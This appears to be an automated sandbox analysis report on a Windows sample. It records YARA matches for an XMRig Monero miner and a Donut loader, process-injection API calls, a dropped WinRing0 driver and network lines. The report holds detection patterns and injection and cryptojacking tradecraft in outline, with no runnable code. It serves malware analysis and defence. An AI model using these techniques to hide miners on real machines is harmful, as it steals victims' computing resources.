            Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745

            System Summary

            barindex
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
            Source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
            Source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
            Source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: Process Memory Space: conhost.exe PID: 6896, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: Process Memory Space: notepad.exe PID: 7112, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
            Source: C:\Users\user\Desktop\9d2h99wrj.exeCode function: 0_2_00401D58 NtAllocateVirtualMemory,0_2_00401D58
            Source: C:\Users\user\Desktop\9d2h99wrj.exeCode function: 0_2_00401D18 NtWriteVirtualMemory,0_2_00401D18
            Source: C:\Users\user\Desktop\9d2h99wrj.exeCode function: 0_2_004019D8 NtCreateThreadEx,0_2_004019D8
            Source: C:\Users\user\Desktop\9d2h99wrj.exeCode function: 0_2_00401D98 NtProtectVirtualMemory,0_2_00401D98
            Source: C:\Users\user\Desktop\9d2h99wrj.exeCode function: 0_2_00401C98 NtClose,0_2_00401C98
            Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to behavior
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
            Source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
            Source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000002.1695881487.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
            Source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: Process Memory Space: conhost.exe PID: 6896, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: Process Memory Space: notepad.exe PID: 7112, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
            Source: WR64.sys.1.drBinary string: \Device\WinRing0_1_2_0
            Source: classification engineClassification label: mal100.evad.mine.winEXE@12/11@2/2
            Source: C:\Windows\System32\conhost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\LibsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jlnwzksp.mzc.ps1Jump to behavior
            Source: 9d2h99wrj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='notepad.exe'
            Source: C:\Users\user\Desktop\9d2h99wrj.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 9d2h99wrj.exeVirustotal: Detection: 59%
            Source: 9d2h99wrj.exeReversingLabs: Detection: 60%
            Source: notepad.exeString found in binary or memory: id-cmc-addExtensions
            Source: notepad.exeString found in binary or memory: set-addPolicy
